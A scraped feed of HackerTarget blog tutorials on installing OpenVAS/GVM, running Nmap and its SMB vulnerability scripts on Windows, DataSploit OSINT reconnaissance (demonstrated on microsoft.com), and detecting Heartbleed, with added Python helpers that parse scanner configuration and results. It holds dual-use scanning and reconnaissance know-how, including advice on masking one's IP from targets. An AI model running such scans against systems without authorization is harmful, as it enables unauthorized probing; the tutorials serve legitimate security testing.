   Active: active (running) since Wed 2019-03-13 20:10:10 EDT; 5s ago
     Docs: man:openvassd(8)
           http://www.openvas.org/
  Process: 128105 ExecStart=/usr/sbin/openvassd --unix-socket=/var/run/openvassd.sock (code=exited, status=0/SUCCESS)
 Main PID: 128109 (openvassd)
    Tasks: 3 (limit: 14486)
   Memory: 7.7M
   CGroup: /system.slice/openvas-scanner.service
           ├─128109 /usr/sbin/openvassd --unix-socket=/var/run/openvassd.sock
           ├─128110 openvassd (Loading Handler)
           └─128111 openvassd: Reloaded 48300 of 49576 NVTs (97% / ETA: 00:00)

Mar 13 20:10:10 kali systemd[1]: Starting Open Vulnerability Assessment System Scanner Daemon...
Mar 13 20:10:10 kali systemd[1]: Started Open Vulnerability Assessment System Scanner Daemon.

● openvas-manager.service - Open Vulnerability Assessment System Manager Daemon
   Loaded: loaded (/lib/systemd/system/openvas-manager.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2019-03-13 20:10:10 EDT; 5s ago
     Docs: man:openvasmd(8)
           http://www.openvas.org/
  Process: 128107 ExecStart=/usr/sbin/openvasmd --listen=127.0.0.1 --port=9390 --database=/var/lib/openvas/mgr/tasks.db (code=exited, status=0/SUCCESS)
 Main PID: 128108 (openvasmd)
    Tasks: 1 (limit: 14486)
   Memory: 74.4M
   CGroup: /system.slice/openvas-manager.service
           └─128108 openvasmd

Mar 13 20:10:10 kali systemd[1]: Starting Open Vulnerability Assessment System Manager Daemon...
Mar 13 20:10:10 kali systemd[1]: Started Open Vulnerability Assessment System Manager Daemon.

[*] Opening Web UI (https://127.0.0.1:9392) in: 5... 4... 3... 2... 1... 

[>] Checking for admin user
[*] Creating admin user
User created with password '450cbcd2-9999-405f-2222-951055a5e938'.

[+] Done

By utilising the prebuilt configuration script we can get up and running with OpenVAS in a very short amount of time.

OpenVAS Web Client (Greenbone Security Assistant)

Access the Greenbone Web Client using your web browser. Log in with admin and the password from the script output, and you will be launching a scan of your target systems within a few minutes.

gsad

Let's first check that gsad is running and listening.

root@kali:~# netstat -apn | grep LISTEN
tcp    0  0 127.0.0.1:9390      0.0.0.0:*           LISTEN      128108/openvasmd    
tcp    0  0 127.0.0.1:80        0.0.0.0:*           LISTEN      128112/gsad         
tcp    0  0 127.0.0.1:9392      0.0.0.0:*           LISTEN      128106/gsad

Now browse to https://localhost:9392/. The Greenbone Security Assistant is a web portal front end to the GVM and OpenVAS scanner.

Task Wizard

The quickest way to fire off a scan is using the Task Wizard.

Enter the target and scan profile. Launch. Results are available under the reports option.

Modify gsad to listen on all interfaces

In the netstat output above, we can see that gsad is only listening on localhost. Here is how to change it so you can access the web interface over your local network.

Kali 2019 uses systemd for its services, so we have to edit the following file to make the web interface listen on all interfaces.

root@kali:~# vi /lib/systemd/system/greenbone-security-assistant.service

Now change the 127.0.0.1 to 0.0.0.0. We also need to add a new parameter to the ExecStart line; this allows remote hosts to connect using our IP address (or hostname). Otherwise we will get the following error in the browser:

The request contained an unknown or invalid Host header. If you are trying to access GSA via its hostname or a proxy, make sure GSA is set up to allow it.

If your IP address is 192.168.1.100 then make the changes as shown below.

[Unit]
Description=Greenbone Security Assistant
Documentation=man:gsad(8) http://www.openvas.org/
Wants=openvas-manager.service

[Service]
Type=simple
PIDFile=/var/run/gsad.pid
ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=0.0.0.0 --mport=9390 --allow-header-host 192.168.1.100

[Install]
WantedBy=multi-user.target

Now restart the service and check with netstat or ss.

root@kali:~# systemctl daemon-reload
root@kali:~# systemctl restart greenbone-security-assistant.service 
root@kali:~# netstat -anp | grep gsad
tcp   0  0 0.0.0.0:80        0.0.0.0:*           LISTEN   128654/gsad         
tcp   0  0 0.0.0.0:9392      0.0.0.0:*           LISTEN   128653/gsad

Looks like we are up and running; now you can access the OpenVAS web interface from any system on your network.
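Before restarting the service it is worth checking that the edited ExecStart line is consistent, since a non-loopback listen address without --allow-header-host produces exactly the Host header error quoted above. The script below is an added example, not part of the post or of gsad itself: it parses the unit file text, extracts the gsad options from ExecStart and reports where gsad listens and which Host header it accepts. The two unit files embedded in it are constructed copies of the before and after versions shown in this post; the option names (--listen, --port, --allow-header-host) are the ones the post uses.

```python
"""Audit the gsad ExecStart line of a systemd unit file.

Added example (not from the HackerTarget post or the gsad project): reads
the unit file text, splits the ExecStart command line and reports whether
the listen address and --allow-header-host setting agree.
"""
import shlex
from typing import Dict, List, Optional

# Constructed sample: the unit file as edited in the post (listen on all interfaces).
UNIT_FILE_REMOTE = """[Unit]
Description=Greenbone Security Assistant
Documentation=man:gsad(8) http://www.openvas.org/
Wants=openvas-manager.service

[Service]
Type=simple
PIDFile=/var/run/gsad.pid
ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=0.0.0.0 --mport=9390 --allow-header-host 192.168.1.100

[Install]
WantedBy=multi-user.target
"""

# Constructed sample: the default localhost-only unit before editing.
UNIT_FILE_LOCAL = UNIT_FILE_REMOTE.replace(
    "--listen=0.0.0.0 --port=9392 --mlisten=0.0.0.0 --mport=9390 --allow-header-host 192.168.1.100",
    "--listen=127.0.0.1 --port=9392 --mlisten=127.0.0.1 --mport=9390",
)

LOOPBACK = ("127.0.0.1", "::1", "localhost")


def exec_start_args(unit_text: str) -> List[str]:
    """Return the argv of the ExecStart= line, split with shell quoting rules."""
    for line in unit_text.splitlines():
        if line.startswith("ExecStart="):
            return shlex.split(line[len("ExecStart="):])
    raise ValueError("no ExecStart= line found")


def parse_gsad_options(argv: List[str]) -> Dict[str, Optional[str]]:
    """Collect --opt=value and --opt value pairs; bare flags map to None."""
    opts: Dict[str, Optional[str]] = {}
    i = 1  # argv[0] is the gsad binary path
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--"):
            if "=" in arg:
                key, val = arg[2:].split("=", 1)
                opts[key] = val
            elif i + 1 < len(argv) and not argv[i + 1].startswith("--"):
                opts[arg[2:]] = argv[i + 1]  # value given as a separate word
                i += 1
            else:
                opts[arg[2:]] = None
        i += 1
    return opts


def audit_gsad(unit_text: str) -> Dict[str, object]:
    """Summarise exposure: listen address, port, accepted Host header, warnings."""
    opts = parse_gsad_options(exec_start_args(unit_text))
    listen = opts.get("listen") or "unspecified"
    host_header = opts.get("allow-header-host")
    remote = listen not in LOOPBACK and listen != "unspecified"
    warnings: List[str] = []
    if remote and not host_header:
        warnings.append("non-loopback listen address without --allow-header-host: "
                        "browsers using the IP or hostname will get the Host header error")
    if listen == "0.0.0.0":
        warnings.append("bound to every interface: firewall port %s or bind a single "
                        "management address if only one network needs the UI" % opts.get("port"))
    return {"listen": listen, "port": opts.get("port"), "allow_header_host": host_header,
            "remote_reachable": remote, "warnings": warnings}


if __name__ == "__main__":
    for label, unit in (("before", UNIT_FILE_LOCAL), ("after", UNIT_FILE_REMOTE)):
        print(label, audit_gsad(unit))
```

To run it against the live file, pass the contents of /lib/systemd/system/greenbone-security-assistant.service to audit_gsad() instead of the embedded samples.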

OpenVAS Command Line Client (omp or gvm-cli)

Accessing OpenVAS from the command line is a powerful feature that gives you full control over scan tasks, reports and other management tasks. The current client in Kali is the omp client. Newer versions of GVM will use the gvm-cli command that is part of the gvm-tools package.

Both clients use XML to perform actions on the GVM server. The omp client has a number of command line switches, but the XML is where the real power lies.

root@kali:~# omp --help
Usage:
  omp [OPTION…] - OpenVAS OMP Command Line Interface

Help Options:
  -?, --help                       Show help options

Application Options:
  -h, --host=                Connect to manager on host 
  -p, --port=              Use port number 
  -V, --version                    Print version.
  -v, --verbose                    Verbose messages (WARNING: may reveal passwords).
  --use-certs                      Use client certificates to authenticate.
  --client-cert=        Client certificate. Default: /usr/var/lib/openvas/CA/clientcert.pem
  --client-key=          Client key. Default: /usr/var/lib/openvas/private/CA/clientkey.pem
  --client-ca-cert=     Client CA certificate. Default: /usr/var/lib/openvas/CA/cacert.pem
  -u, --username=        OMP username
  -w, --password=        OMP password
  --config-file=      Configuration file for connection parameters.
  -P, --prompt                     Prompt to exit.
  -O, --get-omp-version            Print OMP version.
  -n, --name=                Name for create-task.
  -C, --create-task                Create a task.
  -m, --comment=             Comment for create-task.
  -c, --config=            Config for create-task.
  -t, --target=            Target for create-task.
  -E, --delete-report              Delete one or more reports.
  -D, --delete-task                Delete one or more tasks.
  -R, --get-report                 Get report of one task.
  -F, --get-report-formats         Get report formats. (OMP 2.0 only)
  -f, --format=            Format for get-report.
  --filter=                Filter string for get-report
  -G, --get-tasks                  Get status of one, many or all tasks.
  -g, --get-configs                Get configs.
  -T, --get-targets                Get targets.
  -i, --pretty-print               In combination with -X, pretty print the response.
  -S, --start-task                 Start one or more tasks.
  -M, --modify-task                Modify a task.
  --ping                           Ping OMP server
  --timeout=               Wait  seconds for OMP ping response
  --file                           Add text in stdin as file on task.
  -X, --xml=              XML command (e.g. "").  "-" to read from stdin.
  --send-file=               Replace SENDFILE in xml with base64 of file.
  --details                        Enable detailed view.

OpenVAS Python Client (python-gvm)

A new feature coming with GVM is the ability to use a Python client to manage the system. This is very exciting, particularly for those who like to automate all the things with Python.
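The XML that both omp -X and gvm-cli send to the manager is straightforward to build and parse from Python, which is the same idea the python-gvm client packages up. The following is an added example and not code from the post, from the omp client or from python-gvm: it builds create_target, create_task and start_task commands with ElementTree (so hostnames and task names are escaped rather than pasted into XML) and parses a get_tasks_response into a status summary. The element and attribute names follow the OMP/GMP protocol; the sample response and its ids are constructed for the example, and sending the commands over a real connection is left to the caller.

```python
"""Build OMP/GMP XML commands and parse a task-status response.

Added example (not from the HackerTarget post, omp, gvm-cli or python-gvm).
Element names follow the OMP/GMP protocol; SAMPLE_GET_TASKS is a constructed
response with placeholder ids.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List


def create_target_xml(name: str, hosts: List[str]) -> str:
    """<create_target> for a named host list; ElementTree escapes the values."""
    root = ET.Element("create_target")
    ET.SubElement(root, "name").text = name
    ET.SubElement(root, "hosts").text = ",".join(hosts)
    return ET.tostring(root, encoding="unicode")


def create_task_xml(name: str, config_id: str, target_id: str) -> str:
    """<create_task> binding a scan config id to a target id."""
    root = ET.Element("create_task")
    ET.SubElement(root, "name").text = name
    ET.SubElement(root, "config", id=config_id)
    ET.SubElement(root, "target", id=target_id)
    return ET.tostring(root, encoding="unicode")


def start_task_xml(task_id: str) -> str:
    """<start_task task_id="..."/>; the manager answers with a report id."""
    return ET.tostring(ET.Element("start_task", task_id=task_id), encoding="unicode")


def parse_tasks(response_xml: str) -> List[Dict[str, str]]:
    """Summarise <get_tasks_response>: id, name, status and progress per task.

    Raises on a non-2xx status attribute, which is how the manager reports
    authentication failures and malformed commands.
    """
    root = ET.fromstring(response_xml)
    status = root.get("status", "")
    if not status.startswith("2"):
        raise RuntimeError("manager error %s: %s" % (status, root.get("status_text")))
    tasks = []
    for task in root.findall("task"):
        tasks.append({
            "id": task.get("id", ""),
            "name": task.findtext("name", ""),
            "status": task.findtext("status", ""),
            "progress": task.findtext("progress", "").strip(),
        })
    return tasks


# Constructed sample response; the ids are placeholders, not real values.
SAMPLE_GET_TASKS = """<get_tasks_response status="200" status_text="OK">
  <task id="11111111-2222-3333-4444-555555555555">
    <name>Internal LAN</name>
    <status>Running</status>
    <progress>42</progress>
  </task>
  <task id="aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee">
    <name>DMZ hosts</name>
    <status>Done</status>
    <progress>-1</progress>
  </task>
</get_tasks_response>"""

if __name__ == "__main__":
    print(create_target_xml("lan", ["192.168.1.0/24"]))
    print(create_task_xml("lan scan", "PLACEHOLDER-CONFIG-ID", "PLACEHOLDER-TARGET-ID"))
    for t in parse_tasks(SAMPLE_GET_TASKS):
        print("%-12s %-8s %s" % (t["name"], t["status"], t["progress"]))
```

The generated command strings can be passed to omp -X "..." or to gvm-cli, and the response text from either tool fed to parse_tasks().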

Next Steps

OpenVAS (GVM) has a large number of moving parts, services, and configuration items. If you have any issues with the different services, we have an OpenVAS tutorial and guide that includes many tips for keeping an OpenVAS installation running smoothly.

Now that you have a local system ready to scan your internal network, take a look at our hosted solution where we provide the cloud infrastructure so you can check your network perimeter from the attackers' perspective.


The post Install OpenVAS (GVM) on Kali 2019 appeared first on HackerTarget.com.

Using Nmap on Windows https://hackertarget.com/using-nmap-on-windows/ Thu, 24 May 2018 10:29:37 +0000
Running Nmap on Windows is not as difficult or problematic as it was in the past. Nmap is supported on Windows 7 and higher with performance close to, if not quite as good as, Linux based operating systems. The majority of users still use *nix based systems; however, a good number of people use it on Windows.

By installing Nmap on your Windows based systems you have access to the world's best port scanner for security testing and troubleshooting of network connectivity. In addition you have ncat available, a full-featured version of netcat, a virtual Swiss army knife for networks. I am a big fan of ncat and encourage any system administrator or techie to explore the options.

Installing Nmap for Windows

To install the Windows version of Nmap, download the executable installer and click through the wizard. It is your standard Next | Next | Next | Finish... all done. By default, the Nmap installation directory will be added to the system path. With Nmap in your system path, you can run nmap or ncat from any command window.

Screenshot of Nmap installation on Windows

It will run on all the more modern versions of Windows, including Windows 7, 2008 and Windows 10. If you are running something older such as 2K or earlier you may run into problems, but if you are still on those platforms you already have problems...

If you install from the zip file, there are a few additional configuration items to be aware of and apply. These are all documented on the nmap installation page for Windows.

Nmap on the Windows Command Line

During a default installation of the Nmap Windows package, the installation path will be added to the system path. Simply fire up a command prompt and launch nmap. If you installed from the standalone zip file, you need to add the installation folder to the system path manually through system properties.

As you can see the familiar Nmap command options appear after running the command. Access to the Nmap NSE scripts is available as are all the standard options.

Zenmap on Windows

Zenmap is an excellent GUI front-end to the Nmap core scanning engine. It has some pretty nifty features that are not available with the command line version, in particular the network topology map. This rivals commercial mapping tools that perform a similar function and is a nice feature.

It is also intuitive to browse through results from different hosts using Zenmap; there are options to save the results in standard Nmap format (.nmap) or as XML (.xml) for further processing. There does not appear to be an option to save in the grepable format (-oG).

Zenmap is available on Windows and Linux distributions; it can be a great introduction for those less familiar with the command line.

Testing SMB Security with Nmap NSE Scripts

Bundled with Nmap are add-on scripts that perform all manner of functionality. Of note to those in a Windows environment are the 34 smb- scripts that are available. These allow enumeration of entities on Windows systems remotely using the Microsoft SMB protocol (port 445). Examples include smb-os-discovery, smb-enum-users and smb-brute.

There are also vulnerability detection scripts, for testing even the most recent high profile Windows vulnerabilities. Head over to the Nmap NSE scripts page for all the documentation and a list of the scripts.

smb-vuln-ms08-067: Tests Microsoft Windows systems for the very popular remote code execution vulnerability known as MS08-067. For years this was the go-to exploit when using Metasploit. Note this check is dangerous and it may crash systems.
smb-vuln-ms10-054: Detects whether target machines are vulnerable to MS10-054, the SMB remote memory corruption vulnerability.
smb-vuln-ms10-061: Attempts to discover whether systems are vulnerable to the MS10-061 Printer Spooler vulnerability.
smb-vuln-ms17-010: Attempts to detect whether a Microsoft SMBv1 server is vulnerable to the remote code execution vulnerability MS17-010. The vulnerability is actively exploited by the WannaCry and Petya ransomware and other malware.

Wrapping Up

Having access to both Nmap and ncat when on a Windows system is very convenient and lots of fun. There is an amazing number of tricks that can be done with ncat, whether you are troubleshooting, security testing or just need some network-fu during a penetration test.

There are now 600 Nmap NSE scripts. The capabilities these provide are another bonus for having Nmap installed on your Windows workstation. Using the bundled scripts, there are a large number of shortcuts and tests that can be conducted that might otherwise be difficult without additional software installed.

Thanks for reading, we also have a tutorial and cheat sheet for those wanting to discover more about this excellent tool.


The post Using Nmap on Windows appeared first on HackerTarget.com.

DataSploit Tutorial https://hackertarget.com/datasploit-tutorial/ Sat, 17 Feb 2018 06:01:27 +0000

What is DataSploit?

DataSploit is an open source intelligence collection (OSINT) tool. It is a simple way to dump data for a domain or other piece of metadata.

Running DataSploit from the command line, enter an input to search on, or choose to import search data from a text file.

A tutorial for getting started with DataSploit

DataSploit Installation

Often used with the Kali Linux penetration testing distribution, installing within Kali or Ubuntu Linux is a simple process.

Ensure you have git and pip installed.

test@ubuntu:~/$ git clone https://github.com/datasploit/datasploit
test@ubuntu:~/$ cd datasploit
test@ubuntu:~/datasploit/$ pip install -r requirements.txt
test@ubuntu:~/datasploit/$ mv config_sample.py config.py
test@ubuntu:~/datasploit/$ python datasploit.py -h
True
usage: datasploit.py [-h] [-i SINGLE_TARGET] [-f FILE_TARGET] [-a] [-q]
                     [-o OUTPUT]

  ____/ /____ _ / /_ ____ _ _____ ____   / /____   (_)/ /_
 / __  // __ `// __// __ `// ___// __ \ / // __ \ / // __/
/ /_/ // /_/ // /_ / /_/ /(__  )/ /_/ // // /_/ // // /_
\__,_/ \__,_/ \__/ \__,_//____// .___//_/ \____//_/ \__/
                              /_/

           Open Source Assistant for #OSINT
               www.datasploit.info

optional arguments:
  -h, --help            show this help message and exit
  -i SINGLE_TARGET, --input SINGLE_TARGET
                        Provide Input
  -f FILE_TARGET, --file FILE_TARGET
                        Provide Input
  -a, --active          Run Active Scan attacks
  -q, --quiet           Run scans in automated manner accepting default
                        answers
  -o OUTPUT, --output OUTPUT
                        Provide Destination Directory

              Connect at Social Media: @datasploit
                

Similar to recon-ng, you will need to configure API keys to get the full value from this tool. As different Internet resources are searched, the API key will allow you to get additional and more detailed data.

To add the API keys, edit the config.py file and enter them there.

DataSploit as Python Module

A nice feature of this tool is the ability to load it as a Python module for use in your own Python tools. pip install datasploit will get you started then head over to the Help Pages for more information.

Using DataSploit

From the command line you can run the tool with a single target parameter to find information on a single domain.

Rather than selecting modules to use, this tool has a go at whatever modules are available and configured.

~/datasploit$ python datasploit.py -i microsoft.com
True

  ____/ /____ _ / /_ ____ _ _____ ____   / /____   (_)/ /_
 / __  // __ `// __// __ `// ___// __ \ / // __ \ / // __/
/ /_/ // /_/ // /_ / /_/ /(__  )/ /_/ // // /_/ // // /_
\__,_/ \__,_/ \__/ \__,_//____// .___//_/ \____//_/ \__/
                              /_/

           Open Source Assistant for #OSINT
               www.datasploit.info


Target: microsoft.com
Looks like a DOMAIN, running domainOsint...

[-] Skipping Googlepdf because it is marked as disabled.
[-] Skipping Zoomeye because it is marked as disabled.
---> Finding subdomains, will be back soon with list. 

 [+] Extracting subdomains from DNS Dumpster

 [+] Extracting subdomains Netcraft

 [+] Extracting subdomains from Certificate Transparency Reports

As you can see there is a subdomain search module for our own project, DNSDumpster.

With a configured Shodan API key, we can dump subdomains for the target domain and these will then be searched for open ports and other scan data through the Shodan API.

** results snipped **
---> Wapplyzing web page of base domain:

Hitting HTTP and HTTPS:
[+] Third party libraries in Use for HTTP:
  Apache
  Google Analytics
  Google AdSense
  CentOS
[+] Third party libraries in Use for HTTPS:
  Apache
  Google Analytics
  Google AdSense
  CentOS

-----------------------------


---> Searching in Shodan:

IP: 77.xx.44.55
Hosts: [u'test.microsoft.com']
Domain: [u'test.microsoft.com']
Port: 80
Content-Type: text/html; charset=UTF-8
Location: {u'city': u'Fremont', u'region_code': u'CA', u'area_code': 510, u'longitude': -121.9829, u'country_code3': u'USA', u'country_name': u'United States', u'postal_code': u'94536', u'dma_code': 807, u'country_code': u'US', u'latitude': 37.56700000000001}

** results snipped **

While I have snipped most of the results above, there are a couple of interesting things to keep in mind.

In particular, the Wappalyzer module has pulled some data on the HTML/JavaScript libraries of the main domain. These results have been gathered by querying the domain from your current Internet connection.

Active vs Passive vs Semi-Passive

Definitions can vary, but I generally categorize these types of reconnaissance as follows:

Active involves active probes against the target, including such things as port scanning. That is, sending traffic to the target that is not "normal", normal being a browser viewing a legitimate web page.

Passive indicates no packets are sent to the target network. All data collection is done through third party sites. These of course may then perform the query on your behalf depending on the service.

Semi-Passive is the category I would place this tool in. That is, it does send traffic to the target, but it is a standard web browser request, as seen in the Wappalyzer results.

The key takeaway here is that if you are doing OSINT research for incident response and wish to keep your local IP address out of the target's web server logs, you should use a VPS or another layer of anonymity.

Conclusion

DataSploit is a fast and easy tool that can gather a range of data very quickly with minimal configuration.

Go and grab the latest version and start testing. A good place to start testing is various bug bounty programs. By selecting a range of bug bounty programs you will be able to test the tool against a number of varied targets and you may even stumble upon an item of interest.

If you have any suggestions for improvement or have any questions related to this DataSploit Tutorial please get in contact.

The post DataSploit Tutorial appeared first on HackerTarget.com.

Testing Heartbleed with the Nmap NSE script https://hackertarget.com/testing-heartbleed-with-the-nmap-nse-script/ Thu, 10 Apr 2014 15:03:14 +0000
Everywhere is buzzing with news of the Heartbleed vulnerability in OpenSSL. This is a quick tutorial to show how to test for the vulnerability using a handy Nmap NSE script (ssl-heartbleed.nse).

First, you need a working version of Nmap (at least version 6.25); this is not difficult to find or install. So let's jump ahead to running an NSE script to detect the Heartbleed vulnerability.

Update: Since version 6.45 (2014) Nmap has the ssl-heartbleed.nse script included; there is no need to download it separately.

Download the NSE (ssl-heartbleed.nse) script and the tls.lua library that is required:

ssl-heartbleed.nse tls.lua

Now place the tls.lua in the nselib directory on the system you are running Nmap on. Note: I have not tested this on Windows, only Ubuntu Linux, however it should just be a matter of dropping it in the nselib folder (C:\program files\nmap\nselib).

Running the actual ssl-heartbleed.nse script is simply a matter of referencing it as a parameter to the Nmap command.

nmap -sV -p 443 --script=ssl-heartbleed.nse 192.168.1.1

It really is as simple as that: point to the NSE script with --script= and you are cooking! Even better, as this is using Nmap, we can scan entire ranges of IP addresses for the vulnerability.

Testing for the vulnerability

Here is an example of a test against one of my local systems that was running a vulnerable version of OpenVPN-AS.

Nmap scan report for mediacentre (192.168.1.5)
Host is up (0.0059s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE     VERSION
443/tcp  open  ssl         OpenSSL (SSLv3)
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt 
|_      http://cvedetails.com/cve/2014-0160/
Service Info: Host:  firefly003; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Not good! Looks to be well and truly vulnerable.
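When a whole range is scanned, reading script output by eye does not scale; the structured XML that nmap writes with -oX carries the same VULNERABLE / NOT VULNERABLE state for every vulns-library script, whether it is ssl-heartbleed on a port or the smb-vuln-* scripts listed in the Nmap on Windows post, which run as host scripts. The parser below is an added example and not part of this post or of Nmap: it walks an Nmap XML report and returns one finding per host and script whose state is a VULNERABLE variant, so a clean host (like the rescanned one further down) yields nothing. The two XML documents embedded in it are constructed to mirror the scans above, not real Nmap output.

```python
"""Collect VULNERABLE script results from an Nmap XML (-oX) report.

Added example (not from the HackerTarget post or from Nmap). The element
layout (host/ports/port/script and host/hostscript/script, with a <table>
per vulnerability id holding <elem key="state">) follows the Nmap XML
output of vulns-library scripts; both sample documents are constructed.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List


def _script_findings(script: ET.Element, addr: str, where: str) -> List[Dict[str, str]]:
    """One finding per <table> whose state is VULNERABLE, LIKELY VULNERABLE, etc."""
    out = []
    for table in script.findall("table"):
        state = table.findtext("elem[@key='state']", "")
        # vulns library states include NOT VULNERABLE and UNKNOWN; skip those.
        if "VULNERABLE" in state and not state.startswith("NOT"):
            out.append({
                "host": addr,
                "port": where,
                "script": script.get("id", ""),
                "vuln_id": table.get("key", ""),
                "state": state,
                "title": table.findtext("elem[@key='title']", ""),
                "risk": table.findtext("elem[@key='risk_factor']", ""),
            })
    return out


def vulnerable_findings(nmap_xml: str) -> List[Dict[str, str]]:
    """Return all vulnerable script results across every host in the report."""
    root = ET.fromstring(nmap_xml)
    findings: List[Dict[str, str]] = []
    for host in root.findall("host"):
        address = host.find("address[@addrtype='ipv4']")
        addr = address.get("addr", "") if address is not None else ""
        for port in host.findall("ports/port"):
            where = "%s/%s" % (port.get("portid"), port.get("protocol"))
            for script in port.findall("script"):
                findings.extend(_script_findings(script, addr, where))
        for script in host.findall("hostscript/script"):
            findings.extend(_script_findings(script, addr, "host"))
    return findings


# Constructed sample: one host vulnerable to Heartbleed on 443 and MS17-010 over SMB,
# with a NOT VULNERABLE MS08-067 result that must be ignored.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="6.45">
<host>
<status state="up" reason="arp-response"/>
<address addr="192.168.1.5" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="443">
<state state="open" reason="syn-ack"/>
<service name="ssl" product="OpenSSL"/>
<script id="ssl-heartbleed" output="VULNERABLE: The Heartbleed Bug">
<table key="CVE-2014-0160">
<elem key="title">The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library.</elem>
<elem key="state">VULNERABLE</elem>
<elem key="risk_factor">High</elem>
</table>
</script>
</port>
<port protocol="tcp" portid="445">
<state state="open" reason="syn-ack"/>
<service name="microsoft-ds"/>
</port>
</ports>
<hostscript>
<script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
<table key="CVE-2017-0143">
<elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
<elem key="state">VULNERABLE</elem>
<elem key="risk_factor">HIGH</elem>
</table>
</script>
<script id="smb-vuln-ms08-067" output="NOT VULNERABLE">
<table key="CVE-2008-4250">
<elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
<elem key="state">NOT VULNERABLE</elem>
</table>
</script>
</hostscript>
</host>
</nmaprun>
"""

# Constructed sample: the same host after patching, no script tables at all.
CLEAN_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="6.45">
<host>
<status state="up" reason="arp-response"/>
<address addr="192.168.1.5" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/><service name="ssl"/></port></ports>
</host>
</nmaprun>
"""

if __name__ == "__main__":
    for f in vulnerable_findings(SAMPLE_NMAP_XML):
        print("%s %-8s %-18s %-14s %s" % (f["host"], f["port"], f["script"], f["vuln_id"], f["state"]))
    print("clean report findings:", vulnerable_findings(CLEAN_NMAP_XML))
```

Feed it the file written by nmap -oX scan.xml ... to get a list that can be sorted, diffed between runs or handed to a ticketing system.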

Upgrade OpenVPN

OpenVPN had advised that upgrades are required. It was a matter of a quick dpkg -i to upgrade the OpenVPN-AS server on my home network.

Let's try again with another test.

Nmap scan report for mediacentre (192.168.1.5)
Host is up (0.0011s latency).
PORT    STATE SERVICE VERSION
443/tcp open  ssl     OpenSSL (SSLv3)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

Looks good to me, upgrade successful.

Additional testing can be undertaken with our hosted OpenVAS scan, which includes a signature for detecting the Heartbleed bug, and with our SSL/TLS check for vulnerabilities and weak ciphers.

The post Testing Heartbleed with the Nmap NSE script appeared first on HackerTarget.com.
